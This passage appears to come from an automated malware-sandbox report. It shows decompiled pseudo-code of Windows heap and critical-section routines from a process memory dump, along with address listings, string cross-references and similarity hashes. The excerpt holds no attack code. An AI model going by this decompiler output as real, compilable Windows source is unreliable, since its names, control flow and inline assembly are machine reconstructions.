											_t352 =  *(_t496 + 4);
											goto L54;
										}
										_v168 = ( *(_t496 + 0x10) & 0xfffff000) + 0x1000;
										_t357 =  *(_t496 + 0x10) & 0xfffff000;
										__eflags = _t357;
										L60:
										_v164 = _t357;
										 *0x34f491e0( &_v180, _v240);
										_t310 = _v236();
										__eflags = _t310;
										if(_t310 < 0) {
											goto L98;
										}
										E34E98F40( &_v176, 0, 0x58);
										_t503 = _t503 + 0xc;
										_v184 = 0x20;
										_t464 = 4;
										_v188 = _t464;
										__eflags = _v249;
										if(_v249 != 0) {
											_v180 = _v216;
											_v176 =  *(_t496 + 0x10) & 0xfffff000;
											_t367 =  *(_v228 + 0xc) & 0x40000000;
											__eflags = _t367;
										} else {
											_t373 = _v80;
											_v180 = _t373;
											_v176 =  *((intOrPtr*)(_t373 + 0x10));
											_t367 =  *(_t499 + 0x40) & 0x00040000;
										}
										_v172 = 1;
										asm("sbb eax, eax");
										_v168 = ( ~_t367 & 0x0000003c) + _t464;
										 *0x34f491e0( &_v188, _v248);
										_t310 =  *_v244();
										__eflags = _t310;
										if(_t310 < 0) {
											goto L98;
										} else {
											_t436 = _v214;
											_t488 = 0;
											goto L76;
										}
									}
									_t467 = _v208 + 0xfffffff8;
									__eflags =  *((char*)(_t467 + 7)) - 5;
									if( *((char*)(_t467 + 7)) == 5) {
										_t467 = _t467 - (( *(_t467 + 6) & 0x000000ff) << 3);
										__eflags = _t467;
									}
									_t468 = _t467 + 0xffffffe8;
									_v72 = _t468;
									_v172 = _t468 & 0xffff0000;
									_v168 =  *((intOrPtr*)(_t468 + 0x14));
									_t357 =  *(_t468 + 0x10);
									goto L60;
								}
								__eflags = _v241;
								if(_v241 != 0) {
									L30:
									_t489 = _v208;
									L31:
									E34E98F40( &_v160, 0, 0x50);
									_t469 = _v196;
									_t503 = _t503 + 0xc;
									_v172 = _t489;
									_v168 = _v192 + _t469;
									_v164 = _t469;
									_v180 = 3;
									_v176 = 0x1c;
									 *0x34f491e0( &_v180, _v240);
									_t310 =  *_v236();
									__eflags = _t310;
									if(_t310 < 0) {
										goto L98;
									}
									__eflags = _v249;
									if(_v249 != 0) {
										_t471 = _v216;
										_v236 = _v204 + _t471;
										_t492 =  *(_v228 + 0xc) & 0x40000000;
										__eflags = _t492;
										L37:
										_v240 = _t471;
										asm("sbb edi, edi");
										_t495 = ( ~_t492 & 0x0000003c) + 4;
										__eflags = _t495;
										_v224 = _t495;
										L38:
										E34E98F40( &_v188, 0, 0x64);
										_t472 = _v240;
										_t503 = _t503 + 0xc;
										_v176 = _v236 - _t472;
										_v180 = _t472;
										_v188 = 4;
										_v184 = 0x20;
										_v172 = 1;
										_v168 = _t495;
										 *0x34f491e0( &_v188, _v248);
										_t310 =  *_v244();
										__eflags = _t310;
										if(_t310 < 0) {
											goto L98;
										}
										_t488 = 0;
										goto L96;
									}
									__eflags = _v206 & 0x00008000;
									if((_v206 & 0x00008000) != 0) {
										_t471 = _v216;
										_v236 = _v204 + _t471;
										_t492 =  *(_t499 + 0x40) & 0x00040000;
										goto L37;
									}
									_t482 = _v84;
									E34EF8093(_v84, _v84,  &_v240,  &_v236,  &_v76,  &_v224);
									_t495 = _v240;
									goto L38;
								}
								__eflags = _t436 & 0x00008000;
								if((_t436 & 0x00008000) != 0) {
									goto L30;
								}
								_t475 = _v208;
								_v76 = _t475;
								__eflags = _t475 + 0x10 -  *((intOrPtr*)(_t499 + 0xa4));
								if(_t475 + 0x10 !=  *((intOrPtr*)(_t499 + 0xa4))) {
									_t489 = _t475;
								} else {
									_t489 = _t499;
								}
								goto L31;
							}
							_t310 = 0;
							__eflags = 0;
							goto L98;
						}
					}
					E34E98F40( &_v164, _t434, 0x5c);
					_t503 = _t503 + 0xc;
					_v172 = 0x80000000;
					_v168 = 0x64;
					if(_v233 == _t434) {
						_v156 =  *(_t499 + 0x7c) & 0x0000ffff;
						_v160 = 1;
						_v148 = _t499;
						_v152 =  *((intOrPtr*)( *[fs:0x30] + 0x88)) - 1;
						_v144 =  *((intOrPtr*)(_t499 + 0x1f4));
						_v140 =  *((intOrPtr*)(_t499 + 0x1f8)) -  *((intOrPtr*)(_t499 + 0x244));
						_v124 = E34EFD7E5(_t499);
						_v120 =  *(_t499 + 0x74) << 3;
						_v128 =  *((intOrPtr*)(_t499 + 0x208));
						_v108 =  *((intOrPtr*)(_t499 + 0x200));
						_v132 =  *((intOrPtr*)(_t499 + 0x1fc));
						_v136 =  *((intOrPtr*)(_t499 + 0x204));
						_t422 =  *((intOrPtr*)(_t499 + 0x20c));
						_v104 = _t422;
						_v100 = _t422;
						_t423 =  *(_t499 + 0xb4);
						__eflags = _t423;
						if(_t423 != 0) {
							_t480 =  *((intOrPtr*)(_t423 + 0xc));
							_v116 = _t480;
							_t429 =  *_t423;
							__eflags = _t429;
							if(_t429 != 0) {
								_t431 =  *((intOrPtr*)(_t429 + 0xc)) + _t480;
								__eflags = _t431;
								_v116 = _t431;
							}
						}
						_t424 =  *(_t499 + 0xc8);
						_t478 =  *((intOrPtr*)(_t499 + 0x218));
						_v112 = _t478;
						__eflags = _t424;
						if(_t424 != 0) {
							_t427 =  *_t424;
							__eflags = _t427 - 0xffffffff;
							if(_t427 != 0xffffffff) {
								_t434 =  *(_t427 + 0x14);
							}
							_v112 = _t478 + _t434;
						}
					} else {
						_t482 =  &_v172;
						E34F192AB(_v212,  &_v172);
					}
					 *0x34f491e0( &_v172, _v232);
					_t310 =  *_t484();
					goto L98;
				}
			}

0x34ef9068
0x34ef9075
0x34ef907c
0x34ef9081
0x34ef9084
0x34ef9086
0x34ef9093
0x34ef9096
0x34ef909a
0x34ef909e
0x34ef90a2
0x34ef90a9
0x34ef90f8
0x34ef90ff
0x34ef9103
0x34ef9107
0x00000000
0x34ef9109
0x34ef9109
0x00000000
0x34ef9109
0x34ef90ab
0x34ef90ab
0x34ef90b0
0x34ef90b4
0x34ef90ba
0x34ef921d
0x34ef9222
0x34ef9225
0x34ef922d
0x34ef9235
0x34ef9239
0x34ef923d
0x34ef925c
0x34ef9260
0x34ef926d
0x34ef9277
0x34ef9284
0x34ef928e
0x34ef928e
0x34ef928e
0x34ef9292
0x34ef923f
0x34ef9246
0x34ef924a
0x34ef9255
0x34ef9255
0x34ef9294
0x34ef9296
0x34ef9893
0x34ef989a
0x34ef989b
0x34ef989c
0x34ef98a7
0x34ef929c
0x34ef92a7
0x34ef92ad
0x34ef92af
0x34ef92b1
0x00000000
0x00000000
0x34ef92b7
0x34ef92bb
0x34ef92be
0x00000000
0x00000000
0x34ef92c6
0x34ef92cc
0x34ef92cf
0x34ef92d3
0x34ef92d8
0x34ef92d8
0x34ef92da
0x34ef92dd
0x34ef92dd
0x34ef92df
0x34ef92e3
0x34ef92e4
0x34ef92ea
0x34ef92ef
0x34ef92f4
0x00000000
0x00000000
0x34ef92fa
0x34ef92fc
0x00000000
0x00000000
0x34ef9302
0x34ef9306
0x34ef9309
0x34ef947c
0x34ef9482
0x34ef961c
0x34ef9622
0x34ef9674
0x34ef9679
0x34ef9728
0x34ef9728
0x34ef972d
0x34ef9731
0x00000000
0x00000000
0x34ef9737
0x34ef9737
0x34ef973a
0x34ef9805
0x34ef980e
0x34ef9811
0x34ef9819
0x34ef981d
0x34ef9821
0x34ef9829
0x34ef9831
0x34ef9834
0x34ef9836
0x34ef9836
0x34ef983b
0x34ef983f
0x34ef9842
0x34ef984d
0x34ef9844
0x34ef9846
0x34ef9847
0x34ef9847
0x34ef9851
0x34ef9857
0x34ef985e
0x34ef9864
0x00000000
0x00000000
0x34ef9866
0x34ef9866
0x00000000
0x34ef9859
0x34ef9859
0x34ef9869
0x34ef9869
0x34ef986d
0x34ef986d
0x34ef9871
0x34ef987c
0x34ef9882
0x34ef9884
0x34ef9886
0x00000000
0x00000000
0x34ef9888
0x34ef9888
0x00000000
0x34ef9888
0x34ef9857
0x34ef9744
0x34ef9748
0x34ef9755
0x34ef975c
0x34ef975d
0x34ef9764
0x34ef976b
0x34ef9776
0x34ef9781
0x34ef9788
0x34ef978a
0x34ef978c
0x34ef978c
0x34ef9791
0x34ef9798
0x34ef979e
0x34ef97a2
0x34ef97a3
0x34ef97a3
0x34ef97aa
0x34ef97ad
0x34ef97af
0x34ef97af
0x34ef97b2
0x34ef97b2
0x34ef97bd
0x34ef97c9
0x34ef97d6
0x34ef97de
0x34ef97e5
0x34ef97f0
0x00000000
0x34ef97f0
0x34ef967f
0x34ef9683
0x34ef9687
0x34ef9693
0x34ef9697
0x34ef96b3
0x34ef96b8
0x34ef96bd
0x00000000
0x00000000
0x34ef96cb
0x34ef96d0
0x34ef96d4
0x34ef96e1
0x34ef96ed
0x34ef96f5
0x34ef96fc
0x34ef9704
0x34ef970c
0x34ef9714
0x34ef971a
0x34ef971c
0x34ef971e
0x00000000
0x00000000
0x34ef9724
0x00000000
0x34ef9724
0x34ef9689
0x34ef968d
0x00000000
0x00000000
0x00000000
0x34ef968d
0x34ef9624
0x34ef9629
0x34ef962d
0x00000000
0x00000000
0x34ef963b
0x34ef9644
0x34ef9647
0x34ef964b
0x34ef964f
0x34ef9657
0x34ef965f
0x34ef9667
0x00000000
0x34ef9667
0x34ef9492
0x34ef9497
0x34ef949a
0x34ef94a2
0x34ef94a4
0x34ef94ac
0x34ef94b3
0x34ef94b7
0x34ef94f4
0x34ef94f8
0x34ef94fb
0x34ef94ff
0x34ef9503
0x34ef9505
0x34ef9507
0x34ef9509
0x34ef950f
0x34ef950b
0x34ef950b
0x34ef950b
0x34ef9509
0x34ef9515
0x34ef953d
0x34ef953d
0x34ef953f
0x00000000
0x00000000
0x34ef9522
0x34ef9524
0x34ef952d
0x34ef952f
0x34ef952f
0x34ef9531
0x34ef953b
0x34ef953b
0x00000000
0x34ef953b
0x34ef9533
0x34ef9535
0x00000000
0x00000000
0x34ef9537
0x00000000
0x34ef9537
0x34ef9526
0x00000000
0x00000000
0x34ef9528
0x00000000
0x34ef9528
0x34ef9550
0x34ef9557
0x34ef9557
0x34ef9559
0x34ef9561
0x34ef956a
0x34ef9570
0x34ef9574
0x34ef9576
0x00000000
0x00000000
0x34ef9584
0x34ef9589
0x34ef958c
0x34ef9596
0x34ef9597
0x34ef959b
0x34ef959f
0x34ef95c1
0x34ef95cd
0x34ef95d8
0x34ef95d8
0x34ef95a1
0x34ef95a1
0x34ef95a8
0x34ef95af
0x34ef95b6
0x34ef95b6
0x34ef95e7
0x34ef95ef
0x34ef95f8
0x34ef9601
0x34ef9607
0x34ef9609
0x34ef960b
0x00000000
0x34ef9611
0x34ef9611
0x34ef9615
0x00000000
0x34ef9615
0x34ef960b
0x34ef94bd
0x34ef94c0
0x34ef94c4
0x34ef94cd
0x34ef94cd
0x34ef94cd
0x34ef94cf
0x34ef94d4
0x34ef94e0
0x34ef94e7
0x34ef94eb
0x00000000
0x34ef94eb
0x34ef930f
0x34ef9314
0x34ef933c
0x34ef933c
0x34ef9340
0x34ef934a
0x34ef934f
0x34ef9353
0x34ef935c
0x34ef9368
0x34ef9370
0x34ef9377
0x34ef937f
0x34ef9387
0x34ef938d
0x34ef938f
0x34ef9391
0x00000000
0x00000000
0x34ef9397
0x34ef939b
0x34ef93ef
0x34ef93f5
0x34ef9400
0x34ef9400
0x34ef9406
0x34ef9408
0x34ef940c
0x34ef9411
0x34ef9411
0x34ef9414
0x34ef9418
0x34ef9420
0x34ef9425
0x34ef9429
0x34ef9436
0x34ef9442
0x34ef9449
0x34ef9451
0x34ef9459
0x34ef9461
0x34ef9465
0x34ef946b
0x34ef946d
0x34ef946f
0x00000000
0x00000000
0x34ef9475
0x00000000
0x34ef9475
0x34ef939d
0x34ef93a5
0x34ef93d6
0x34ef93df
0x34ef93e3
0x00000000
0x34ef93e3
0x34ef93a7
0x34ef93c7
0x34ef93cc
0x00000000
0x34ef93cc
0x34ef9316
0x34ef931c
0x00000000
0x00000000
0x34ef931e
0x34ef9322
0x34ef932c
0x34ef9332
0x34ef9338
0x34ef9334
0x34ef9334
0x34ef9334
0x00000000
0x34ef9332
0x34ef9891
0x34ef9891
0x00000000
0x34ef9891
0x34ef9296
0x34ef90c8
0x34ef90cd
0x34ef90d0
0x34ef90d8
0x34ef90e4
0x34ef9119
0x34ef9123
0x34ef912b
0x34ef9136
0x34ef9140
0x34ef9150
0x34ef9159
0x34ef9166
0x34ef9173
0x34ef917d
0x34ef918a
0x34ef9194
0x34ef9198
0x34ef919e
0x34ef91a5
0x34ef91ac
0x34ef91b2
0x34ef91b4
0x34ef91b6
0x34ef91b9
0x34ef91c0
0x34ef91c2
0x34ef91c4
0x34ef91c9
0x34ef91c9
0x34ef91cb
0x34ef91cb
0x34ef91c4
0x34ef91d2
0x34ef91d8
0x34ef91de
0x34ef91e5
0x34ef91e7
0x34ef91e9
0x34ef91eb
0x34ef91ee
0x34ef91f0
0x34ef91f0
0x34ef91f6
0x34ef91f6
0x34ef90e6
0x34ef90ea
0x34ef90ee
0x34ef90ee
0x34ef9208
0x34ef920e
0x00000000
0x34ef920e

APIs

RtlDebugPrintTimes.NTDLL ref: 34EF9208
RtlDebugPrintTimes.NTDLL ref: 34EF92A7
RtlDebugPrintTimes.NTDLL ref: 34EF9387
RtlDebugPrintTimes.NTDLL ref: 34EF9465
RtlDebugPrintTimes.NTDLL ref: 34EF956A
RtlDebugPrintTimes.NTDLL ref: 34EF9601
RtlDebugPrintTimes.NTDLL ref: 34EF9714
RtlDebugPrintTimes.NTDLL ref: 34EF987C

Strings

, xrefs: 34EF9657
, xrefs: 34EF9704
0, xrefs: 34EF9776

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $ $0
API String ID: 3446177414-3352262554
Opcode ID: 5a36edd91a023b62f319358354d2d8615ee1e8b02b759b63e705639fe112b1b0
Instruction ID: a00b7aef54c39e977dcfc224ceb85ef61b897fc2237de92b75eaef40707586aa
Opcode Fuzzy Hash: 5a36edd91a023b62f319358354d2d8615ee1e8b02b759b63e705639fe112b1b0
Instruction Fuzzy Hash: A43203B1A083818FE350CF68C884B5ABBE5BB88348F45492EF59987350D776E949CF52

Uniqueness

Uniqueness Score: -1.00%

Function 34E88540 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 34EC5215, 34EC52A1, 34EC5324
Critical section address., xrefs: 34EC530D
Critical section debug info address, xrefs: 34EC522A, 34EC5339
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 34EC52D9
Invalid debug info address of this critical section, xrefs: 34EC52C1
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 34EC52ED
corrupted critical section, xrefs: 34EC52CD
Thread is in a state in which it cannot own a critical section, xrefs: 34EC534E
Address of the debug info found in the active list., xrefs: 34EC52B9, 34EC5305
Thread identifier, xrefs: 34EC5345
undeleted critical section in freed memory, xrefs: 34EC5236
Critical section address, xrefs: 34EC5230, 34EC52C7, 34EC533F
8, xrefs: 34EC50EE
double initialized or corrupted critical section, xrefs: 34EC5313

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 1e429b376300f2edd8c115ee3b5fe242b19d8b84e88639e6cdd643d7255e0320
Instruction ID: 15d333a9293feba710fbd5512dd1facc1815186b3c2f73acdfdfc217b3edfeab
Opcode Fuzzy Hash: 1e429b376300f2edd8c115ee3b5fe242b19d8b84e88639e6cdd643d7255e0320
Instruction Fuzzy Hash: 338179B1A01358EFEB54CF94C940BAEBBF9FB48714F204199E914B7280C774A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 34EFFDF4 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348
timeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E34EFFDF4(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t130;
				signed int _t132;
				intOrPtr _t138;
				intOrPtr _t139;
				signed int _t149;
				signed int _t150;
				intOrPtr _t151;
				signed int _t152;
				intOrPtr _t155;
				intOrPtr _t159;
				intOrPtr _t172;
				signed int _t173;
				signed int _t174;
				signed char _t177;
				signed int _t178;
				signed int _t183;
				void* _t184;
				signed char _t192;
				signed int _t193;
				intOrPtr _t195;
				intOrPtr _t199;
				signed int _t209;
				signed int _t226;
				signed char _t236;
				intOrPtr _t240;
				signed int* _t248;
				signed int _t253;
				signed int _t255;
				signed int _t267;
				signed int _t278;
				signed int* _t279;
				intOrPtr* _t283;
				void* _t284;
				void* _t286;

				_push(0x40);
				_push(0x34f2d430);
				L34EA7BE4(__ebx, __edi, __esi);
				_t281 = __ecx;
				 *((intOrPtr*)(_t284 - 0x3c)) = __ecx;
				 *((char*)(_t284 - 0x19)) = 0;
				 *(_t284 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t284 - 4)) = 0;
					 *((intOrPtr*)(_t284 - 4)) = 1;
					_t130 = E34E47662("RtlReAllocateHeap");
					__eflags = _t130;
					if(_t130 == 0) {
						L72:
						 *(_t284 - 0x24) = 0;
						L73:
						 *((intOrPtr*)(_t284 - 4)) = 0;
						 *((intOrPtr*)(_t284 - 4)) = 0xfffffffe;
						E34F002E6(_t281);
						_t132 =  *(_t284 - 0x24);
						goto L75;
					}
					_t236 =  *(__ecx + 0x44) | __edx;
					 *(_t284 - 0x30) = _t236;
					 *(_t284 - 0x34) = _t236 | 0x10000100;
					__eflags =  *(_t284 + 0xc);
					if( *(_t284 + 0xc) == 0) {
						_t267 = 1;
						__eflags = 1;
					} else {
						_t267 =  *(_t284 + 0xc);
					}
					_t138 = ( *((intOrPtr*)(_t281 + 0x94)) + _t267 &  *(_t281 + 0x98)) + 8;
					 *((intOrPtr*)(_t284 - 0x40)) = _t138;
					__eflags = _t138 -  *(_t284 + 0xc);
					if(_t138 <  *(_t284 + 0xc)) {
						L68:
						_t139 =  *[fs:0x30];
						__eflags =  *(_t139 + 0xc);
						if( *(_t139 + 0xc) == 0) {
							_push("HEAP: ");
							E34E4B910();
						} else {
							E34E4B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t281 + 0x78)));
						E34E4B910("Invalid allocation size - %Ix (exceeded %Ix)\n",  *(_t284 + 0xc));
						goto L72;
					}
					__eflags = _t138 -  *((intOrPtr*)(_t281 + 0x78));
					if(_t138 >  *((intOrPtr*)(_t281 + 0x78))) {
						goto L68;
					}
					 *(_t284 - 0x20) = 0;
					__eflags = _t236 & 0x00000001;
					if((_t236 & 0x00000001) == 0) {
						E34E5FED0( *((intOrPtr*)(_t281 + 0xc8)));
						 *((char*)(_t284 - 0x19)) = 1;
						_t226 =  *(_t284 - 0x30) | 0x10000101;
						__eflags = _t226;
						 *(_t284 - 0x34) = _t226;
					}
					E34F00835(_t281, 0);
					_t277 =  *((intOrPtr*)(_t284 + 8));
					_t269 = _t277 - 8;
					__eflags =  *((char*)(_t269 + 7)) - 5;
					if( *((char*)(_t269 + 7)) == 5) {
						_t269 = _t269 - (( *(_t269 + 6) & 0x000000ff) << 3);
						__eflags = _t269;
					}
					 *(_t284 - 0x2c) = _t269;
					 *(_t284 - 0x28) = _t269;
					_t240 = _t281;
					_t149 = E34E4753F(_t240, _t269, "RtlReAllocateHeap");
					__eflags = _t149;
					if(_t149 == 0) {
						L53:
						_t150 =  *(_t284 - 0x24);
						__eflags = _t150;
						if(_t150 == 0) {
							goto L73;
						}
						__eflags = _t150 -  *0x34f447c8; // 0x0
						_t151 =  *[fs:0x30];
						if(__eflags != 0) {
							_t152 =  *(_t151 + 0x68);
							 *(_t284 - 0x48) = _t152;
							__eflags = _t152 & 0x00000800;
							if((_t152 & 0x00000800) == 0) {
								goto L73;
							}
							__eflags =  *(_t284 - 0x20) -  *0x34f447cc; // 0x0
							if(__eflags != 0) {
								goto L73;
							}
							__eflags =  *((intOrPtr*)(_t281 + 0x7c)) -  *0x34f447ce; // 0x0
							if(__eflags != 0) {
								goto L73;
							}
							_t155 =  *[fs:0x30];
							__eflags =  *(_t155 + 0xc);
							if( *(_t155 + 0xc) == 0) {
								_push("HEAP: ");
								E34E4B910();
							} else {
								E34E4B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(E34EF823A(_t281,  *(_t284 - 0x20)));
							_push( *(_t284 + 0xc));
							E34E4B910("Just reallocated block at %p to 0x%Ix bytes with tag %ws\n",  *(_t284 - 0x24));
							L59:
							_t159 =  *[fs:0x30];
							__eflags =  *((char*)(_t159 + 2));
							if( *((char*)(_t159 + 2)) != 0) {
								 *0x34f447a1 = 1;
								 *0x34f44100 = 0;
								asm("int3");
								 *0x34f447a1 = 0;
							}
							goto L73;
						}
						__eflags =  *(_t151 + 0xc);
						if( *(_t151 + 0xc) == 0) {
							_push("HEAP: ");
							E34E4B910();
						} else {
							E34E4B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *(_t284 + 0xc));
						E34E4B910("Just reallocated block at %p to %Ix bytes\n",  *0x34f447c8);
						goto L59;
					} else {
						__eflags = _t277 -  *0x34f447c8; // 0x0
						_t172 =  *[fs:0x30];
						if(__eflags != 0) {
							_t173 =  *(_t172 + 0x68);
							 *(_t284 - 0x44) = _t173;
							__eflags = _t173 & 0x00000800;
							if((_t173 & 0x00000800) == 0) {
								L38:
								_t174 = E34E62710(_t281,  *(_t284 - 0x34), _t277,  *(_t284 + 0xc));
								 *(_t284 - 0x24) = _t174;
								__eflags = _t174;
								if(_t174 != 0) {
									_t75 = _t174 - 8; // -8
									_t278 = _t75;
									__eflags =  *((char*)(_t278 + 7)) - 5;
									if( *((char*)(_t278 + 7)) == 5) {
										_t278 = _t278 - (( *(_t278 + 6) & 0x000000ff) << 3);
										__eflags = _t278;
									}
									_t248 = _t278;
									 *(_t284 - 0x28) = _t278;
									__eflags =  *(_t281 + 0x4c);
									if( *(_t281 + 0x4c) != 0) {
										 *_t278 =  *_t278 ^  *(_t281 + 0x50);
										__eflags =  *(_t278 + 3) - (_t248[0] ^ _t248[0] ^  *_t248);
										if(__eflags != 0) {
											_push(_t248);
											_t269 = _t278;
											E34F0D646(0, _t281, _t278, _t278, _t281, __eflags);
										}
									}
									__eflags =  *(_t278 + 2) & 0x00000002;
									if(( *(_t278 + 2) & 0x00000002) == 0) {
										_t177 =  *(_t278 + 3);
										 *(_t284 - 0x1b) = _t177;
										_t178 = _t177 & 0x000000ff;
									} else {
										_t183 = E34E83AE9(_t278);
										 *(_t284 - 0x30) = _t183;
										__eflags =  *(_t281 + 0x40) & 0x08000000;
										if(( *(_t281 + 0x40) & 0x08000000) == 0) {
											 *_t183 = 0;
										} else {
											_t184 = E34E7FDB9(1, _t269);
											_t253 =  *(_t284 - 0x30);
											 *_t253 = _t184;
											_t183 = _t253;
										}
										_t178 =  *((intOrPtr*)(_t183 + 2));
									}
									 *(_t284 - 0x20) = _t178;
									__eflags =  *(_t281 + 0x4c);
									if( *(_t281 + 0x4c) != 0) {
										 *(_t278 + 3) =  *(_t278 + 2) ^  *(_t278 + 1) ^  *_t278;
										 *_t278 =  *_t278 ^  *(_t281 + 0x50);
										__eflags =  *_t278;
									}
								}
								E34F00D24(_t281);
								__eflags = 0;
								E34F00835(_t281, 0);
								goto L53;
							}
							__eflags =  *0x34f447cc;
							if( *0x34f447cc == 0) {
								goto L38;
							}
							_t279 =  *(_t284 - 0x28);
							_t269 =  *(_t284 - 0x2c);
							__eflags =  *(_t281 + 0x4c);
							if( *(_t281 + 0x4c) != 0) {
								 *_t279 =  *_t279 ^  *(_t281 + 0x50);
								__eflags = _t279[0] - ( *(_t269 + 2) ^  *(_t269 + 1) ^  *_t269);
								if(__eflags != 0) {
									_push(_t240);
									E34F0D646(0, _t281, _t279, _t279, _t281, __eflags);
									_t269 =  *(_t284 - 0x2c);
								}
							}
							__eflags = _t279[0] & 0x00000002;
							if((_t279[0] & 0x00000002) == 0) {
								_t192 = _t279[0];
								 *(_t284 - 0x1a) = _t192;
								_t193 = _t192 & 0x000000ff;
							} else {
								_t209 = E34E83AE9(_t279);
								 *(_t284 - 0x30) = _t209;
								_t193 =  *(_t209 + 2) & 0x0000ffff;
							}
							_t255 = _t193;
							 *(_t284 - 0x20) = _t193;
							__eflags =  *(_t281 + 0x4c);
							if( *(_t281 + 0x4c) != 0) {
								_t279[0] =  *(_t269 + 2) ^  *(_t269 + 1) ^  *_t269;
								 *_t279 =  *_t279 ^  *(_t281 + 0x50);
								__eflags =  *_t279;
							}
							__eflags = _t255;
							if(_t255 == 0) {
								L37:
								_t277 =  *((intOrPtr*)(_t284 + 8));
							} else {
								__eflags = _t255 -  *0x34f447cc; // 0x0
								if(__eflags != 0) {
									goto L37;
								}
								__eflags =  *((intOrPtr*)(_t281 + 0x7c)) -  *0x34f447ce; // 0x0
								if(__eflags != 0) {
									goto L37;
								}
								_t195 =  *[fs:0x30];
								__eflags =  *(_t195 + 0xc);
								if( *(_t195 + 0xc) == 0) {
									_push("HEAP: ");
									E34E4B910();
								} else {
									E34E4B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t269 =  *(_t284 - 0x20);
								_push(E34EF823A(_t281,  *(_t284 - 0x20)));
								_push( *(_t284 + 0xc));
								_t277 =  *((intOrPtr*)(_t284 + 8));
								E34E4B910("About to rellocate block at %p to 0x%Ix bytes with tag %ws\n",  *((intOrPtr*)(_t284 + 8)));
								_t286 = _t286 + 0x10;
								L18:
								_t199 =  *[fs:0x30];
								__eflags =  *((char*)(_t199 + 2));
								if( *((char*)(_t199 + 2)) != 0) {
									 *0x34f447a1 = 1;
									 *0x34f44100 = 0;
									asm("int3");
									 *0x34f447a1 = 0;
								}
							}
							goto L38;
						}
						__eflags =  *(_t172 + 0xc);
						if( *(_t172 + 0xc) == 0) {
							_push("HEAP: ");
							E34E4B910();
						} else {
							E34E4B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *(_t284 + 0xc));
						E34E4B910("About to reallocate block at %p to %Ix bytes\n",  *0x34f447c8);
						_t286 = _t286 + 0xc;
						goto L18;
					}
				} else {
					_t283 =  *0x34f4374c; // 0x0
					 *0x34f491e0(__ecx, __edx,  *((intOrPtr*)(_t284 + 8)),  *(_t284 + 0xc));
					_t132 =  *_t283();
					L75:
					 *[fs:0x0] =  *((intOrPtr*)(_t284 - 0x10));
					return _t132;
				}
			}

0x34effdf4
0x34effdf6
0x34effdfb
0x34effe02
0x34effe04
0x34effe09
0x34effe0c
0x34effe16
0x34effe35
0x34effe38
0x34effe46
0x34effe4b
0x34effe4d
0x34f00277
0x34f00277
0x34f0027a
0x34f0027a
0x34f002c2
0x34f002c9
0x34f002ce
0x00000000
0x34f002ce
0x34effe56
0x34effe58
0x34effe62
0x34effe65
0x34effe69
0x34effe72
0x34effe72
0x34effe6b
0x34effe6b
0x34effe6b
0x34effe81
0x34effe84
0x34effe87
0x34effe8a
0x34f00231
0x34f00231
0x34f00237
0x34f0023a
0x34f00259
0x34f0025e
0x34f0023c
0x34f00251
0x34f00256
0x34f00264
0x34f0026f
0x00000000
0x34f00274
0x34effe90
0x34effe93
0x00000000
0x00000000
0x34effe9b
0x34effe9f
0x34effea2
0x34effeaa
0x34effeaf
0x34effeb6
0x34effeb6
0x34effebb
0x34effebb
0x34effec2
0x34effec7
0x34effeca
0x34effecd
0x34effed1
0x34effeda
0x34effeda
0x34effeda
0x34effedc
0x34effedf
0x34effee7
0x34effee9
0x34effeee
0x34effef0
0x34f00122
0x34f00122
0x34f00125
0x34f00127
0x00000000
0x00000000
0x34f0012d
0x34f00133
0x34f00139
0x34f001a7
0x34f001aa
0x34f001ad
0x34f001b2
0x00000000
0x00000000
0x34f001bc
0x34f001c3
0x00000000
0x00000000
0x34f001cd
0x34f001d4
0x00000000
0x00000000
0x34f001da
0x34f001e0
0x34f001e3
0x34f00202
0x34f00207
0x34f001e5
0x34f001fa
0x34f001ff
0x34f00218
0x34f00219
0x34f00224
0x34f0017e
0x34f0017e
0x34f00184
0x34f00188
0x34f0018e
0x34f00195
0x34f0019b
0x34f0019c
0x34f0019c
0x00000000
